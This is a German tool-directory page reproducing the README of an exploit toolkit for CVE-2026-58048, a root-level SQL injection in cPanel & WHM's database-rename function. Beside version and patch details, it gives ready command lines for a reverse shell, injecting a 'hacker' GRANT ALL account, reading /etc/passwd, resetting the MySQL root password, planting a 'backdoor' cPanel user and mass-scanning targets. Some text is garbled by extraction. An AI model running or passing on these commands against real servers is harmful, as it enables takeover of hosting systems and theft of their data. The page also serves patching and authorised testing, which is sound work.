Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – cPanel Root SQL Execution Toolkit (CVSS 9.4) | Komplette Red/Blue-Team-Toolkit-Suite für ungepatchte cPanel & WHM 11.x. 2 Tools: Safe Checker (Audit/Reporting), Weaponized (Reverse Shell, Persistenz, UDF RCE, Deployment, Datei lesen/schreiben, Datenbankoperationen, Massenscan). Mit Python. 🦾 Ethisch einsetzen, legal bleiben <3 | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsRed TeamingIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Datenbanksicherheit
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Repository anzeigen
525vor 1 MonatNoch nicht geprüft

Über

👾 CVE-2026-58048 – cPanel Root SQL Execution Toolkit (CVSS 9.4) | Komplette Red/Blue-Team-Toolkit-Suite für ungepatchte cPanel & WHM 11.x. 2 Tools: Safe Checker (Audit/Reporting), Weaponized (Reverse Shell, Persistenz, UDF RCE, Deployment, Datei lesen/schreiben, Datenbankoperationen, Massenscan). Mit Python. 🦾 Ethisch einsetzen, legal bleiben <3

Teilen

CVEPoC

💥 CVE‑2026‑58048 – cPanel Root SQL Execution Toolkit

Python 3.8+ CVSS Author cPanel

⚠️ NUR ZUR ETHISCHEN VERWENDUNG – AUTORISIERTE SICHERHEITSTESTS
Dieses Repository stellt Tools ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit.
Unbefugter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.


📖 Schwachstellenübersicht

CVE‑2026‑58048 ist eine kritische SQL-Injection-Schwachstelle in cPanel & WHM Versionen , die es einem authentifizierten cPanel-Benutzer ermöglicht, beliebige SQL-Befehle mit über die Datenbank-Umbenennungsfunktion auszuführen.

11.x
MySQL-Root-Rechten

Funktionsweise

  1. Authentifizierter Zugriff erforderlich – der Angreifer muss über ein gültiges cPanel-Konto (Benutzername/Passwort) auf dem Zielserver verfügen.
  2. SQL-Modus-Manipulation – der Exploit setzt die MySQL-Sitzung in den ANSI_QUOTES-Modus, was das Parsing-Verhalten ändert.
  3. Datenbank-Umbenennungs-Injection – beim Umbenennen einer Datenbank wird der neue Name nicht ordnungsgemäß bereinigt, sodass der Angreifer beliebige SQL-Anweisungen einschleusen kann.
  4. Root-Rechte – da der Umbenennungsvorgang mit MySQL-Root-Rechten ausgeführt wird, wird das eingeschleuste SQL mit den höchsten Datenbankberechtigungen ausgeführt.
  5. Auswirkung – vollständige Datenbankübernahme, Rechteausweitung, Serverkompromittierung, Datendiebstahl, Backdoors und laterale Bewegung. Sofort aktualisieren!

Betroffene Versionen

  • cPanel & WHM 11.110 und früher – anfällig
  • 11.111 – 11.118 – anfällig
  • 11.119 – 11.126 – anfällig
  • 11.127 – 11.134 – anfällig
  • 11.135 – 11.136 – anfällig
  • 11.137.x – anfällig unter 11.137.1.6
  • 11.138.1.6 und später – gepatcht

Patch

  • Aktualisieren Sie auf cPanel & WHM 11.138.1.6 oder neuer.
  • Falls ein Upgrade nicht möglich ist, deaktivieren Sie MySQL-Umbenennungsvorgänge für cPanel-Benutzer als vorübergehende Problemumgehung.

🧰 Tools

ToolZweckVorgesehener Benutzer
exploit.pyVollständiges weaponisiertes Toolkit mit Reverse Shell, Persistenz, UDF RCE, Datei lesen/schreiben, Datenbankoperationen, Proxy-Unterstützung und Massenscanning.Red Teams / autorisierte Pentester
safecheck.pyNicht-intrusiver Schwachstellenprüfer, der die cPanel-Version erkennt und das Risiko bewertet, ohne eine schädliche Nutzlast auszuführen. Erstellt detaillierte Berichte.Blue Teams / Sicherheitsauditoren

📊 Funktionsvergleich

Funktionexploit.pysafecheck.py
Schwachstellenerkennung✅✅
Versionserkennung✅✅
MySQL-Root-SQL-Injection✅❌
Reverse Shell✅❌
Persistenz (cPanel-Benutzererstellung)✅❌
UDF RCE (Befehlsausführung)✅❌
Datei lesen/schreiben✅❌
Datenbankoperationen (beliebiges SQL)✅❌
Proxy-Unterstützung✅✅
Massenscanning (Multi-Thread)✅❌
Interaktive Shell✅❌
Nicht-intrusiver (sicherer) Modus❌✅
Ausführlicher/Debug-Modus✅✅
SSL-Verifizierungssteuerung✅✅
Benutzerdefinierter User-Agent✅✅
Anfrageverzögerung / Wiederholungen✅❌
JSON- / Berichtsausgabe✅✅
Endpunkt-Erreichbarkeitsprüfung❌✅
SQL-Modus-Leckerkennung❌✅

🎯 Zusammenfassung der Anwendungsfälle

SzenarioEmpfohlenes Tool
Blue Team – Überprüfung, ob Ihre cPanel-Installation anfällig istsafecheck.py
Sicherheitsaudit – nicht-intrusive Schwachstellenbewertungsafecheck.py
Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzungexploit.py
Bug Bounty – Tests zur verantwortungsvollen Offenlegungsafecheck.py
Massenscanning – Überprüfung mehrerer Ziele auf Schwachstellenexploit.py (nur Erkennung)
Incident Response – Überprüfung, ob Systeme kompromittiert wurdensafecheck.py

⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Parameter

exploit.py Parameter

ParameterBeschreibung
-t, --targetZiel-cPanel-URL (z. B. https://cpanel.example.com:2083)
-l, --target-fileDatei mit Zielliste (eine pro Zeile) für Massenscanning
-u, --mysql-usercPanel/MySQL-Benutzername
-P, --mysql-passcPanel/MySQL-Passwort
--mysql-portMySQL-Port (Standard: 3306)
-p, --portcPanel-Port überschreiben (Standard aus URL oder 2083)
--threadsAnzahl der Threads für Multi-Target (Standard: 10)
-o, --outputErgebnisse in Datei speichern (einzelnes Ziel)
--logProtokolldatei für detaillierte Ausgabe
-v, --verboseAusführliche Ausgabe
--proxyHTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080)
-ua, --user-agentBenutzerdefinierter User-Agent
--no-keep-aliveSitzung nicht am Leben erhalten
--delayVerzögerung zwischen Anfragen (Standard: 2,0 s)
--max-retriesMaximale Wiederholungen (Standard: 3)
--ssl-verifySSL-Zertifikate überprüfen
--cmdAuszuführender Befehl (Präfix mit sql: oder udf: für spezifisch)
--injectBenutzerdefiniertes SQL zum Einschleusen (überschreibt andere Aktionen)
--reverse-shellReverse-Shell-IP:PORT (verwendet UDF)
--passwdMySQL-Root-Passwort ändern
--addusercPanel-Benutzer erstellen (USER DOMAIN PASSWORD)

safecheck.py Parameter

ParameterBeschreibung
-t, --targetZiel-cPanel-URL (z. B. https://cpanel.example.com:2083)
-v, --verboseAusführliche Ausgabe
--proxyHTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080)
-ua, --user-agentBenutzerdefinierter User-Agent
--ssl-verifySSL-Zertifikate überprüfen
--timeoutAnfrage-Timeout in Sekunden (Standard: 10)
--logBericht in Datei speichern
--jsonErgebnisse im JSON-Format ausgeben

💥 Szenarien

#SzenarioBefehl
1Schnelle Schwachstellenprüfungpython safecheck.py -t https://cpanel.example.com:2083
2Detaillierter Scan mit Berichtpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse Shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Benutzerdefiniertes SQL ausführen (Root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Sensible Datei lesenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6MySQL-Root-Passwort ändernpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Neuen cPanel-Benutzer erstellen (Persistenz)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Interaktive Shell nach der Ausnutzungpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Massenscanning aus Dateipython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Proxy und benutzerdefinierten User-Agent verwendenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

🧪 Endpunkt- und API-Nutzung

Der Exploit verwendet die folgenden cPanel-UAPI-Endpunkte:

EndpunktZweck
/execute/Mysql/create_databaseTemporäre Datenbank erstellen
/execute/Mysql/delete_databaseErstellte Datenbanken bereinigen
/execute/Mysql/rename_databaseAnfälliger Endpunkt – löst SQL-Injection aus
/execute/Version/get_versionAuthentifizierungs- und Versionsprüfung
/execute/UserManager/create_userNeuen cPanel-Benutzer erstellen (Persistenz)
/execute/UserManager/list_usersVorhandene Benutzer auflisten

🛡️ Verantwortungsvolle Nutzung

  • Verwenden Sie diese Tools nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unbefugter Zugriff ist illegal und unethisch.
  • Die Autoren sind nicht für jeglichen Missbrauch verantwortlich.
  • Befolgen Sie stets die Gesetze und Vorschriften Ihres Landes.

Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Tool herunterladen
--readDatei über LOAD_FILE lesen
-i, --interactiveInteraktive Shell nach dem Exploit
--verifyExploit-Erfolg durch Versuch der MySQL-Anmeldung überprüfen
--pingZiel vor der Ausnutzung anpingen